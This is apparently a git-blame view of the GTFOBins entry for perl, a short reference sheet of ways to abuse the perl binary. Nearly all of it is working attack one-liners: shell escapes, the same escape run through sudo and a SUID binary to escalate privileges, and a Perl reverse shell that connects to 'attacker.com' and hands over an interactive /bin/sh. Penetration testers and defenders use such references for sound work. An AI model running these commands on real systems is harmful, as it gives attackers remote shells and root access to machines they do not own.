GTFOBins.github.io/_gtfobins/perl.md

16 lines
617 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-05-21 21:14:41 +02:00
- code: perl -e 'exec "/bin/sh";'
sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";'
suid-enabled:
- code: ./perl -e 'exec "/bin/sh";'
2018-05-25 15:30:02 +02:00
reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
2018-05-22 20:21:16 +02:00
code: |
2018-05-24 21:59:21 +02:00
export RHOST=attacker.com
2018-05-23 09:08:13 +02:00
export RPORT=12345
2018-05-21 21:14:41 +02:00
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2018-05-25 01:10:39 +02:00
---